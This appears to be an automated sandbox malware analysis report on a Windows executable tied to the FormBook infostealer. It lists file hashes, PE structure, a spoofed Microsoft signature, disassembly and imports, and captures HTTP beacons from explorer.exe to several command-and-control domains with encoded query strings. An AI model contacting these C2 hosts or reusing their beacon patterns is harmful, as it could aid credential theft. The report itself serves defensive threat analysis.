                                                                                                                                                                                                                                                                                • www.businessjp6-51399.info/hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA==
                                                                                                                                                                                                                                                                                198.185.159.1445h48M0mr7p.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.pizzeriadonluca.com/tqug/?t8eH=Bd68RFqHJL7&BZ=Tm91fa44ftZCPMS4MR2eIRgBICbXKooMeZ+9PNwMGgavbZaFtNpIYa/u14epU4tdNV9dH3afqQ==
                                                                                                                                                                                                                                                                                rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.wearelemonpepper.com/e72r/
                                                                                                                                                                                                                                                                                4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.wearelemonpepper.com/e72r/
                                                                                                                                                                                                                                                                                firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144/
                                                                                                                                                                                                                                                                                firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144/
                                                                                                                                                                                                                                                                                firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144/
                                                                                                                                                                                                                                                                                LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.consultoriamax.net/rn94/?D8v=8pGtVJo0up&Rfg=2JuEGy1AzmLWlmggvy20ihD+4b+i/qJT0Rq51f6xG6YauqLT7h1HcItJQqrNe+TJOdi5
                                                                                                                                                                                                                                                                                Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.trenchonbirmingham.com/pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve
                                                                                                                                                                                                                                                                                DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.wearelemonpepper.com/e72r/
                                                                                                                                                                                                                                                                                Official Salary for the Month of August 2024 - NU1622662404290592.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.trenchonbirmingham.com/pt46/?Cj90E=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve&GVWh=CdT0vvb
                                                                                                                                                                                                                                                                                52.206.163.162SKM_TR0020102023_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.getconsol.com/g11y/?DXIDO=zV+AjaIknu0nyITedyv88oZsA+21f869+9+9v+sataYbziG/sKwtZ2V3W9q9ogEF1jb3&tzrh=jlNdnlthmFpxsX
                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No created / dropped files found
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.067796423389837
TrID:
• Win64 Executable GUI (202006/5) 77.37%
• InstallShield setup (43055/19) 16.49%
• Win64 Executable (generic) (12005/4) 4.60%
• Generic Win/DOS Executable (2004/3) 0.77%
• DOS Executable Generic (2002/1) 0.77%
File name: kHslwiV2w6.exe
File size: 1'627'744 bytes
MD5: 3364dc2488f8444000a9da4c6d999fc4
SHA1: 19cf9bd0f6976d75f7738ec74d2b326edee5bdde
SHA256: fcf632af143e88dfba5e9256d0fb238eb314b0d20e63141cb659ed7ad001cbb4
SHA512: 24778076f2e3fbd0ab39675bab98bd7da9feaa08e276d720da2fca252377ceb2c7b1da1b9c3b862e2acbea9b6e0c29e77e093c9cff366055d894a969545ea921
SSDEEP: 49152:AAodtaG9kS2U84B+FLan9k5TRM9zlcVj7vdLJ7t:A/B18P7t
TLSH: 7C75CF19E3A811FCD527C674CB55A233E6B170560B21A4CB1B99C7452FB3EE26B7B302
                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x14006ac2c
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 22a65106d3d84ea74d966fa0424a5a0c
Signature Valid: false
Signature Issuer: C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before: 17/09/2024 12:22:40
Not After: 17/09/2025 12:22:40
Subject Chain:
• C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Version: 3
Thumbprint MD5: F377CA390FA4FC298436022336FD1B10
Thumbprint SHA-1: E82434363EAD01AD4A46E44521DF4A39C3DDF5F9
Thumbprint SHA-256: 11E14F15FBDE946D88B6FFC159BD10F8806ECC7BD2769F260436DD6CB51A2A4A
Serial: 101013DA8DDB93A6F41083213D4E782B
                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                                                                arpl word ptr [eax+04h], dx
                                                                                                                                                                                                                                                                                neg eax
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                add edx, ecx
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                arpl ax, cx
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                and edx, ecx
                                                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                                                arpl bx, ax
                                                                                                                                                                                                                                                                                dec edx
                                                                                                                                                                                                                                                                                mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                                                                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                                                                                                je 00007FD30D716B6Dh
                                                                                                                                                                                                                                                                                movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                                                                                                and eax, FFFFFFF0h
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                add ecx, eax
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                xor ecx, edx
                                                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                                jmp 00007FD30D716B76h
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                cmp ecx, dword ptr [00000049h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x17f3c0 | 0x5c | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17f41c | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19c000 | 0x2eac4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x18f000 | 0xcdec | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x18b800 | 0x1e60 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1cb000 | 0x5b8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x165ae0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x165d00 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1659a0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11a000 | 0x6a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6f188 | 0x6f200 | 16824105689e93571b28f6d652acf3f1 | False | 0.45466728768278963 | data | 6.6338226603175485 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed | 0x71000 | 0x77a28 | 0x77c00 | 459fe8e4d0429964edfb07e39e66b232 | False | 0.46850331093423797 | data | 6.473781869755907 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated | 0xe9000 | 0x30498 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x11a000 | 0x66c6a | 0x66e00 | a4f6a29290662b437a865514bcf05f6c | False | 0.488105634872418 | data | 6.7027087254675255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x181000 | 0xd5a8 | 0x1800 | 9d5075bd44b367f703d8e922b003398a | False | 0.2294921875 | data | 3.190641782829915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x18f000 | 0xcdec | 0xce00 | 638451eb673a6cdf25f666b19f1b8bb4 | False | 0.49419751213592233 | data | 6.064103613023274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x19c000 | 0x2eac4 | 0x2ec00 | 6d3dc884e9811facd65d86d807ddff66 | False | 0.9950388536096256 | data | 7.997171322620239 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1cb000 | 0x5b8 | 0x600 | adcf9b9e4d3994d1018ad464f4f1db74 | False | 0.5826822916666666 | data | 5.215191968056739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BINARY | 0x19c118 | 0x2e484 | data | | | 1.0003481526807756
RT_VERSION | 0x1ca59c | 0x33c | data | | | 0.38405797101449274
RT_MANIFEST | 0x1ca8d8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
ADVAPI32.dll | RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
bcrypt.dll | BCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
KERNEL32.dll | TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
ole32.dll | CoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
api-ms-win-crt-heap-l1-1-0.dll | malloc, free, _callnewh, calloc, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-string-l1-1-0.dll | strcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
api-ms-win-crt-convert-l1-1-0.dll | strtoull
api-ms-win-crt-runtime-l1-1-0.dll | __p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale

                                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.412271976 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.428450108 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.428823948 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.429305077 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.429472923 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.523859978 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.645068884 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745217085 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745511055 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745574951 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.846487999 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847243071 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847323895 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847346067 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847558975 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847697973 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.944434881 CEST8049745198.185.159.144192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
• www.andrewghita.com
• www.attorney-services-8344642.zone
• www.yeslabs.xyz
• www.vizamag.com
• www.tigajco69.fun
• www.upcyclecharms.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49736 | 172.66.0.70 | 80 | 4828 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:02:10.271385908 CEST | 166 | OUT | GET /md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXY HTTP/1.1
Host: www.andrewghita.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 8, 2024 16:02:10.387456894 CEST | 557 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 14:02:10 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Tue, 08 Oct 2024 15:02:10 GMT
Location: https://www.andrewghita.com/md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXY
Server: cloudflare
CF-RAY: 8cf6aac688d97cac-EWR
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49738 | 104.18.188.223 | 80 | 4828 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:02:32.159362078 CEST | 181 | OUT | GET /md02/?all=VJE6G0uhaXXjZ9YRdQlMdfAmJtBHOO9P9ftsD0Za8iws3BCdMQRNDr5e7yfdzu876eSq&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.attorney-services-8344642.zone
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
Oct 8, 2024 16:02:32.268712044 CEST | 406 | IN | HTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:02:32 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                Content-Length: 16
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8cf6ab4f4afa7d16-EWR
                                                                                                                                                                                                                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                                                                                                                                                                                                                                                Data Ascii: error code: 1001


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49739 | 52.206.163.162 | 80 | 4828 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:02:51.423815966 CEST | 162 | OUT | GET /md02/?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.yeslabs.xyz
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
Oct 8, 2024 16:02:51.523401022 CEST | 432 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:02:51 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Location: https://www.yeslabs.xyz/md02?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXY
                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49740 | 198.185.159.144 | 80 | 4828 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:03:11.864633083 CEST | 162 | OUT | GET /md02/?all=ItgQDVkBdIs0QziWKwlLzzQfsI1xbGOZBoDnu4i2Zg+9o67qJyVsSqA76p+pq/A3lGOx&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.vizamag.com
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
Oct 8, 2024 16:03:11.962738991 CEST | 1276 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                Content-Length: 2061
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:03:11 UTC
                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Server: Squarespace
                                                                                                                                                                                                                                                                                X-Contextid: axS4pUth/BsnNyiGA
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px;
Oct 8, 2024 16:03:11.962840080 CEST | 1084 | IN | Data Raw: 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72
                                                                                                                                                                                                                                                                                Data Ascii: font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "Helvetica Neue", Helv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49741 | 172.67.143.211 | 80 | 4828 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:03:32.317439079 CEST | 164 | OUT | GET /md02/?all=PZp0UtAd/MX+bbfmlI0lLX5uB5dB2ubu0xorlIAgjhA6JQ6omJZi4VnySSsC/hEyaNVU&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.tigajco69.fun
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
Oct 8, 2024 16:03:32.428450108 CEST | 962 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:03:32 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Expires: Tue, 08 Oct 2024 15:03:32 GMT
                                                                                                                                                                                                                                                                                Location: https://www.tigajco69.fun/md02/?all=PZp0UtAd/MX+bbfmlI0lLX5uB5dB2ubu0xorlIAgjhA6JQ6omJZi4VnySSsC/hEyaNVU&P6=6lUxOJCX68zXY
                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgK9xD7AsErj9CAXTR3WJ1h6FojjVLmMZ38kO1Tcy0kXyyMv9oYg%2Fege4gX4a4b1Nsd%2BXbSd%2BoikdN9Mba5zdf3NXgvAZ4o3zOQr8dcZJYF8vN348AxetIiFLmV4Z0LJR57zcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8cf6acc74db080d9-EWR
                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.11.20 | 49745 | 198.185.159.144 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:05:35.745574951 CEST | 168 | OUT | GET /md02/?all=Huvb14uAl+TqSP+sM2oBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyA8WIhVJbwk&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.upcyclecharms.com
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
Oct 8, 2024 16:05:35.847243071 CEST | 1276 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                Content-Length: 2061
